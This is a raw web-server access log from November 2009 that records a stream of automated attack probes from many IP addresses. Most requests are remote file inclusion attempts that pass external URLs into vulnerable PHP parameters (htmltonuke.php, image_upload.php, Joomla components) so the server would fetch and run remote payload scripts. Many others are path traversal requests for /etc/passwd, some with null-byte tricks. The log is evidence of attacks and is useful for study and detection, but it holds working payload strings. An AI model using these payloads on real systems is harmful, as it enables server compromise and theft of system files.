157.100.230.82 - - [11/Nov/2009:19:54:28 -0600] "GET /logs/access_log.1250380800/htmltonuke.php?filnavn=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
157.100.230.82 - - [11/Nov/2009:19:54:28 -0600] "GET /logs/htmltonuke.php?filnavn=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
91.196.124.202 - - [11/Nov/2009:19:54:47 -0600] "GET /db.php?path_local=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 289 "-""-"
91.196.124.202 - - [11/Nov/2009:19:54:48 -0600] "GET /db.php?path_local=./../../../../../../../../etc/passwd HTTP/1.1" 404 289 "-""-"
157.100.230.82 - - [11/Nov/2009:19:55:03 -0600] "GET /logs/htmltonuke.php?filnavn=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
157.100.230.82 - - [11/Nov/2009:19:55:03 -0600] "GET /logs/access_log.1250380800/htmltonuke.php?filnavn=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
157.100.230.82 - - [11/Nov/2009:19:55:07 -0600] "GET /htmltonuke.php?filnavn=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
85.214.74.222 - - [11/Nov/2009:19:55:38 -0600] "GET /logs/htmltonuke.php?filnavn=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
85.214.74.222 - - [11/Nov/2009:19:55:38 -0600] "GET /htmltonuke.php?filnavn=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
85.214.74.222 - - [11/Nov/2009:19:55:38 -0600] "GET /logs/access_log.1245456000/htmltonuke.php?filnavn=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
85.214.74.222 - - [11/Nov/2009:19:55:44 -0600] "GET /logs/access_log.1243468800/htmltonuke.php?filnavn=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
118.220.173.228 - - [11/Nov/2009:19:56:24 -0600] "GET /?_SERVER[DOCUMENT_ROOT]=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
118.220.173.228 - - [11/Nov/2009:19:56:24 -0600] "GET /logs/access_log.1233014400/?_SERVER[DOCUMENT_ROOT]=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
118.220.173.228 - - [11/Nov/2009:19:56:28 -0600] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 200 212466 "-""Mozilla/5.0"
118.220.173.228 - - [11/Nov/2009:19:56:35 -0600] "GET /logs/access_log.1235779200/?_SERVER[DOCUMENT_ROOT]=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
85.214.74.222 - - [11/Nov/2009:19:56:41 -0600] "GET /logs/access_log.1252800000/htmltonuke.php?filnavn=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
85.214.74.222 - - [11/Nov/2009:19:57:08 -0600] "GET /logs/access_log.1250380800/htmltonuke.php?filnavn=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
209.217.76.225 - - [11/Nov/2009:19:59:18 -0600] "GET /tags.php?BBCodeFile=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 291 "-""-"
209.217.76.225 - - [11/Nov/2009:19:59:18 -0600] "GET /tags.php?BBCodeFile=./../../../../../../../../etc/passwd HTTP/1.1" 404 291 "-""-"
190.95.231.98 - - [11/Nov/2009:19:59:24 -0600] "GET /logs/access_log.1249171200/image_upload.php?sbp=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
190.95.231.98 - - [11/Nov/2009:19:59:24 -0600] "GET /image_upload.php?sbp=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
190.95.231.98 - - [11/Nov/2009:19:59:24 -0600] "GET /logs/image_upload.php?sbp=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
190.95.231.98 - - [11/Nov/2009:19:59:24 -0600] "GET /logs/access_log.1242086400/image_upload.php?sbp=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
81.176.229.7 - - [11/Nov/2009:19:59:25 -0600] "GET //skin/dognara_gallery/write.php?dir=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/fx29id1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
81.176.229.7 - - [11/Nov/2009:19:59:25 -0600] "GET /logs/access_log.1254009600//skin/dognara_gallery/write.php?dir=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/fx29id1.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
81.176.229.7 - - [11/Nov/2009:19:59:25 -0600] "GET /logs//skin/dognara_gallery/write.php?dir=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/fx29id1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
62.103.31.24 - - [11/Nov/2009:19:59:36 -0600] "GET /logs/access_log.1242086400/image_upload.php?sbp=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
62.103.31.24 - - [11/Nov/2009:19:59:36 -0600] "GET /image_upload.php?sbp=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
62.103.31.24 - - [11/Nov/2009:19:59:36 -0600] "GET /logs/image_upload.php?sbp=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
62.103.31.24 - - [11/Nov/2009:19:59:36 -0600] "GET /logs/access_log.1249171200/image_upload.php?sbp=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
157.100.230.82 - - [11/Nov/2009:20:00:10 -0600] "GET /logs/access_log.1242086400/image_upload.php?sbp=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
157.100.230.82 - - [11/Nov/2009:20:00:10 -0600] "GET /image_upload.php?sbp=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
157.100.230.82 - - [11/Nov/2009:20:00:10 -0600] "GET /logs/image_upload.php?sbp=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
157.100.230.82 - - [11/Nov/2009:20:00:10 -0600] "GET /logs/access_log.1249171200/image_upload.php?sbp=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
82.194.87.83 - - [11/Nov/2009:20:01:05 -0600] "GET /logs/access_log.1251331200//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 373 "-""Mozilla/5.0"
82.194.87.83 - - [11/Nov/2009:20:01:05 -0600] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
82.194.87.83 - - [11/Nov/2009:20:01:05 -0600] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
82.194.87.83 - - [11/Nov/2009:20:01:09 -0600] "GET /logs/access_log.1245628800//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 373 "-""Mozilla/5.0"
190.95.231.98 - - [11/Nov/2009:20:01:39 -0600] "GET /htmltonuke.php?filnavn=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
190.95.231.98 - - [11/Nov/2009:20:01:39 -0600] "GET /logs/htmltonuke.php?filnavn=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
190.95.231.98 - - [11/Nov/2009:20:01:39 -0600] "GET /logs/access_log.1252800000/htmltonuke.php?filnavn=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
209.97.212.185 - - [11/Nov/2009:20:01:45 -0600] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
209.97.212.185 - - [11/Nov/2009:20:01:45 -0600] "GET /logs/access_log.1251331200//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 373 "-""Mozilla/5.0"
209.97.212.185 - - [11/Nov/2009:20:01:45 -0600] "GET /logs/access_log.1245628800//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 373 "-""Mozilla/5.0"
209.97.212.185 - - [11/Nov/2009:20:01:45 -0600] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
190.95.231.98 - - [11/Nov/2009:20:03:16 -0600] "GET /logs/access_log.1250380800/htmltonuke.php?filnavn=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
212.108.197.244 - - [11/Nov/2009:20:03:21 -0600] "GET /logs/index.php?openfile=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-""-"
212.108.197.244 - - [11/Nov/2009:20:03:22 -0600] "GET /logs/index.php?openfile=./../../../../../../../../etc/passwd HTTP/1.1" 404 297 "-""-"
65.55.106.115 - - [11/Nov/2009:20:03:55 -0600] "GET /logs/access_log.1252627200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
91.196.124.202 - - [11/Nov/2009:20:03:58 -0600] "GET //skin/zero_vote/ask_password.php?dir=?&mode=id HTTP/1.1" 404 315 "-""-"
117.58.251.130 - - [11/Nov/2009:20:04:32 -0600] "GET /logs/index.php?content=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-""-"
117.58.251.130 - - [11/Nov/2009:20:04:32 -0600] "GET /index.php?content=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 292 "-""-"
117.58.251.130 - - [11/Nov/2009:20:04:33 -0600] "GET /logs/index.php?content=./../../../../../../../../etc/passwd HTTP/1.1" 404 297 "-""-"
117.58.251.130 - - [11/Nov/2009:20:04:33 -0600] "GET /index.php?content=./../../../../../../../../etc/passwd HTTP/1.1" 404 292 "-""-"
85.214.74.222 - - [11/Nov/2009:20:04:39 -0600] "GET /index2.php?ascii_seite=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
85.214.74.222 - - [11/Nov/2009:20:04:39 -0600] "GET /logs/index2.php?ascii_seite=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
85.214.74.222 - - [11/Nov/2009:20:04:39 -0600] "GET /logs/access_log.1252195200/index2.php?ascii_seite=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
85.214.74.222 - - [11/Nov/2009:20:04:40 -0600] "GET /logs/access_log.1252627200/index2.php?ascii_seite=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
209.217.76.225 - - [11/Nov/2009:20:05:49 -0600] "GET /logs/tags.php?BBCodeFile=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-""-"
209.217.76.225 - - [11/Nov/2009:20:05:49 -0600] "GET /logs/tags.php?BBCodeFile=./../../../../../../../../etc/passwd HTTP/1.1" 404 296 "-""-"
85.214.74.222 - - [11/Nov/2009:20:07:55 -0600] "GET /logs/access_log.1245456000/image_upload.php?sbp=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
85.214.74.222 - - [11/Nov/2009:20:07:55 -0600] "GET /logs/access_log.1243468800/image_upload.php?sbp=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
66.148.120.132 - - [11/Nov/2009:20:07:58 -0600] "GET /logs/access_log.1248480000//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 354 "-""Mozilla/5.0"
66.148.120.132 - - [11/Nov/2009:20:07:58 -0600] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
66.148.120.132 - - [11/Nov/2009:20:07:58 -0600] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
66.148.120.132 - - [11/Nov/2009:20:07:58 -0600] "GET /logs/access_log.1248652800//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 354 "-""Mozilla/5.0"
213.79.101.98 - - [11/Nov/2009:20:08:37 -0600] "GET ///skin/sirini_simplism_gallery_v4/setup.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
213.79.101.98 - - [11/Nov/2009:20:08:37 -0600] "GET /logs///skin/sirini_simplism_gallery_v4/setup.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
213.79.101.98 - - [11/Nov/2009:20:08:37 -0600] "GET /logs/access_log.1250294400///skin/sirini_simplism_gallery_v4/setup.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
213.79.101.98 - - [11/Nov/2009:20:08:41 -0600] "GET /logs/access_log.1252713600///skin/sirini_simplism_gallery_v4/setup.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
213.79.101.98 - - [11/Nov/2009:20:08:46 -0600] "GET /logs/access_log.1253577600///skin/sirini_simplism_gallery_v4/setup.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
190.95.231.98 - - [11/Nov/2009:20:09:01 -0600] "GET /logs/access_log.1252195200/index2.php?ascii_seite=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
190.95.231.98 - - [11/Nov/2009:20:09:01 -0600] "GET /index2.php?ascii_seite=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
190.95.231.98 - - [11/Nov/2009:20:09:02 -0600] "GET /logs/index2.php?ascii_seite=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
157.100.230.82 - - [11/Nov/2009:20:09:09 -0600] "GET /index2.php?ascii_seite=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
157.100.230.82 - - [11/Nov/2009:20:09:09 -0600] "GET /logs/access_log.1252627200/index2.php?ascii_seite=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
157.100.230.82 - - [11/Nov/2009:20:09:10 -0600] "GET /logs/index2.php?ascii_seite=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
157.100.230.82 - - [11/Nov/2009:20:09:12 -0600] "GET /logs/access_log.1252195200/index2.php?ascii_seite=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
213.79.101.98 - - [11/Nov/2009:20:10:02 -0600] "GET /logs//common/db.php?commonpath=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
213.79.101.98 - - [11/Nov/2009:20:10:02 -0600] "GET //common/db.php?commonpath=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
213.79.101.98 - - [11/Nov/2009:20:10:02 -0600] "GET /logs/access_log.1253491200//common/db.php?commonpath=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
157.100.230.82 - - [11/Nov/2009:20:10:29 -0600] "GET /logs/index2.php?ascii_seite=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
157.100.230.82 - - [11/Nov/2009:20:10:32 -0600] "GET /index2.php?ascii_seite=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
157.100.230.82 - - [11/Nov/2009:20:10:32 -0600] "GET /logs/access_log.1252195200/index2.php?ascii_seite=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
157.100.230.82 - - [11/Nov/2009:20:10:32 -0600] "GET /logs/access_log.1252627200/index2.php?ascii_seite=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
62.103.31.24 - - [11/Nov/2009:20:11:00 -0600] "GET /htmltonuke.php?filnavn=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
62.103.31.24 - - [11/Nov/2009:20:11:00 -0600] "GET /logs/access_log.1252800000/htmltonuke.php?filnavn=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
62.103.31.24 - - [11/Nov/2009:20:11:00 -0600] "GET /logs/htmltonuke.php?filnavn=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
65.55.207.45 - - [11/Nov/2009:20:11:25 -0600] "GET /logs/access_log.1196035200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
209.97.212.185 - - [11/Nov/2009:20:11:45 -0600] "GET //impex/ImpExData.php?systempath=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
209.97.212.185 - - [11/Nov/2009:20:11:45 -0600] "GET /logs//impex/ImpExData.php?systempath=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
209.97.212.185 - - [11/Nov/2009:20:11:45 -0600] "GET /logs/access_log.1243900800//impex/ImpExData.php?systempath=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
209.97.212.185 - - [11/Nov/2009:20:11:45 -0600] "GET /logs/access_log.1239235200//impex/ImpExData.php?systempath=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
62.103.31.24 - - [11/Nov/2009:20:11:51 -0600] "GET /logs/access_log.1250380800/htmltonuke.php?filnavn=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
65.55.106.157 - - [11/Nov/2009:20:12:27 -0600] "GET /logs/access_log.1254960000 HTTP/1.1" 200 1444296 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
62.103.31.24 - - [11/Nov/2009:20:12:44 -0600] "GET /logs/index2.php?ascii_seite=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
62.103.31.24 - - [11/Nov/2009:20:12:44 -0600] "GET /logs/access_log.1252195200/index2.php?ascii_seite=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
62.103.31.24 - - [11/Nov/2009:20:12:54 -0600] "GET /index2.php?ascii_seite=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
62.141.47.10 - - [11/Nov/2009:20:13:36 -0600] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
62.141.47.10 - - [11/Nov/2009:20:13:36 -0600] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
62.141.47.10 - - [11/Nov/2009:20:13:36 -0600] "GET /logs/access_log.1245456000//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 354 "-""Mozilla/5.0"
65.55.106.209 - - [11/Nov/2009:20:13:55 -0600] "GET /logs/access_log.1186963200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
91.121.28.22 - - [11/Nov/2009:20:14:26 -0600] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
91.121.28.22 - - [11/Nov/2009:20:14:26 -0600] "GET /logs/access_log.1248652800//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 354 "-""Mozilla/5.0"
91.121.28.22 - - [11/Nov/2009:20:14:26 -0600] "GET /logs/access_log.1248480000//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 354 "-""Mozilla/5.0"
91.121.28.22 - - [11/Nov/2009:20:14:26 -0600] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
118.220.173.228 - - [11/Nov/2009:20:14:57 -0600] "GET /logs/access_log.1253145600//skin/rosun2005GL_GUEST/setup.php?dir=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 343 "-""Mozilla/5.0"
118.220.173.228 - - [11/Nov/2009:20:14:57 -0600] "GET /logs//skin/rosun2005GL_GUEST/setup.php?dir=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
118.220.173.228 - - [11/Nov/2009:20:14:57 -0600] "GET //skin/rosun2005GL_GUEST/setup.php?dir=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 316 "-""Mozilla/5.0"
118.220.173.228 - - [11/Nov/2009:20:14:58 -0600] "GET /logs/access_log.1253145600//skin/rosun2005GL_GUEST/setup.php?dir=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 343 "-""Mozilla/5.0"
118.220.173.228 - - [11/Nov/2009:20:14:58 -0600] "GET /logs//skin/rosun2005GL_GUEST/setup.php?dir=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
118.220.173.228 - - [11/Nov/2009:20:14:58 -0600] "GET //skin/rosun2005GL_GUEST/setup.php?dir=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 316 "-""Mozilla/5.0"
118.220.173.228 - - [11/Nov/2009:20:15:09 -0600] "GET /logs/access_log.1252627200//skin/rosun2005GL_GUEST/setup.php?dir=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 343 "-""Mozilla/5.0"
118.220.173.228 - - [11/Nov/2009:20:15:13 -0600] "GET /logs/access_log.1252627200//skin/rosun2005GL_GUEST/setup.php?dir=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 343 "-""Mozilla/5.0"
65.55.106.208 - - [11/Nov/2009:20:15:35 -0600] "GET /logs/access_log.1215648000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
91.121.28.22 - - [11/Nov/2009:20:17:32 -0600] "GET /xmlrpc.php HTTP/1.1" 404 293 "-""-"
82.194.87.83 - - [11/Nov/2009:20:18:25 -0600] "GET /logs/access_log.1243900800//impex/ImpExData.php?systempath=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
82.194.87.83 - - [11/Nov/2009:20:18:25 -0600] "GET //impex/ImpExData.php?systempath=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
82.194.87.83 - - [11/Nov/2009:20:18:25 -0600] "GET /logs//impex/ImpExData.php?systempath=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
82.194.87.83 - - [11/Nov/2009:20:18:29 -0600] "GET /logs/access_log.1249516800//impex/ImpExData.php?systempath=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
209.97.212.185 - - [11/Nov/2009:20:18:31 -0600] "GET /logs/access_log.1249516800//impex/ImpExData.php?systempath=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
150.101.220.114 - - [11/Nov/2009:20:18:57 -0600] "GET /?site_path=http://torontoyangtaichi.com/lang/asc.txt???&mode=id HTTP/1.1" 200 3245 "-""-"
150.101.220.114 - - [11/Nov/2009:20:19:10 -0600] "GET /logs/?site_path=http://torontoyangtaichi.com/lang/asc.txt???&mode=id HTTP/1.1" 200 212466 "-""-"
188.40.50.203 - - [11/Nov/2009:20:19:18 -0600] "GET /?visualizar=./../../../../../../../../etc/passwd%00 HTTP/1.1" 200 3245 "-""-"
74.213.177.58 - - [11/Nov/2009:20:19:18 -0600] "GET /phphtml.php?htmlclass_path=http://www.spotmerkezi.com/cache/idv6.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
74.213.177.58 - - [11/Nov/2009:20:19:18 -0600] "GET /logs/phphtml.php?htmlclass_path=http://www.spotmerkezi.com/cache/idv6.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
188.40.50.203 - - [11/Nov/2009:20:19:18 -0600] "GET /logs/access_log.1241049600%20/?visualizar=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 311 "-""-"
188.40.50.203 - - [11/Nov/2009:20:19:18 -0600] "GET /?visualizar=./../../../../../../../../etc/passwd HTTP/1.1" 200 3245 "-""-"
188.40.50.203 - - [11/Nov/2009:20:19:18 -0600] "GET /logs/access_log.1241049600%20/?visualizar=./../../../../../../../../etc/passwd HTTP/1.1" 404 311 "-""-"
188.40.50.203 - - [11/Nov/2009:20:19:19 -0600] "GET /logs/?visualizar=./../../../../../../../../etc/passwd%00 HTTP/1.1" 200 212466 "-""-"
188.40.50.203 - - [11/Nov/2009:20:19:21 -0600] "GET /logs/?visualizar=./../../../../../../../../etc/passwd HTTP/1.1" 200 212466 "-""-"
124.247.200.12 - - [11/Nov/2009:20:20:38 -0600] "GET /logs/access_log.1248480000//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 354 "-""Mozilla/5.0"
124.247.200.12 - - [11/Nov/2009:20:20:38 -0600] "GET /logs/access_log.1248652800//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 354 "-""Mozilla/5.0"
124.247.200.12 - - [11/Nov/2009:20:20:38 -0600] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
124.247.200.12 - - [11/Nov/2009:20:20:38 -0600] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
91.121.28.22 - - [11/Nov/2009:20:20:45 -0600] "GET /logs/xmlrpc.php HTTP/1.1" 404 298 "-""-"
91.121.28.22 - - [11/Nov/2009:20:20:45 -0600] "GET /xmlrpc.php HTTP/1.1" 404 293 "-""-"
91.121.28.22 - - [11/Nov/2009:20:21:36 -0600] "GET /logs/access_log.1228608000%20/xmlrpc.php HTTP/1.1" 404 321 "-""-"
91.137.0.63 - - [11/Nov/2009:20:21:41 -0600] "GET /errors.php?error=http://www.nopaste.pl/Source/hbb.txt?&mode=id HTTP/1.1" 404 293 "-""-"
85.214.74.222 - - [11/Nov/2009:20:21:47 -0600] "GET /logs//includes/header.php?c_temp_path=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
85.214.74.222 - - [11/Nov/2009:20:21:47 -0600] "GET //includes/header.php?c_temp_path=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
85.214.74.222 - - [11/Nov/2009:20:21:47 -0600] "GET /logs/access_log.1234051200//includes/header.php?c_temp_path=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
85.214.74.222 - - [11/Nov/2009:20:21:48 -0600] "GET /logs/access_log.1243468800//includes/header.php?c_temp_path=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
212.108.197.244 - - [11/Nov/2009:20:21:52 -0600] "GET /?view=./../../../../../../../../etc/passwd%00 HTTP/1.1" 200 3245 "-""-"
212.108.197.244 - - [11/Nov/2009:20:21:52 -0600] "GET /?view=./../../../../../../../../etc/passwd HTTP/1.1" 200 3245 "-""-"
